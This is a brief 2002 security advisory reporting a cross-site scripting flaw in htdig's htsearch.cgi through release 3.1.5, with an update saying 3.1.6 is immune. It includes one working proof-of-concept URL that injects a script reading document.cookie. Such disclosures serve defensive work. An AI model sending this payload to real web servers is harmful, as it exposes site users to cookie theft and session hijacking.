27th Jun 2002 [SBWID-5490]
COMMAND

	htdig cross site scripting bug

SYSTEMS AFFECTED

	htdig all releases up to 3.1.5 ??

PROBLEM

	Howard Yeend found :
	
	http://<webserver>/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
	
	
	Will trigger the cross site scripting bug.

SOLUTION

	 Update (01 July 2002)
	 ======
	
	Peter Watkins  [http://www.tux.org/~peterw/  ]  says  version  3.1.6  is
	imune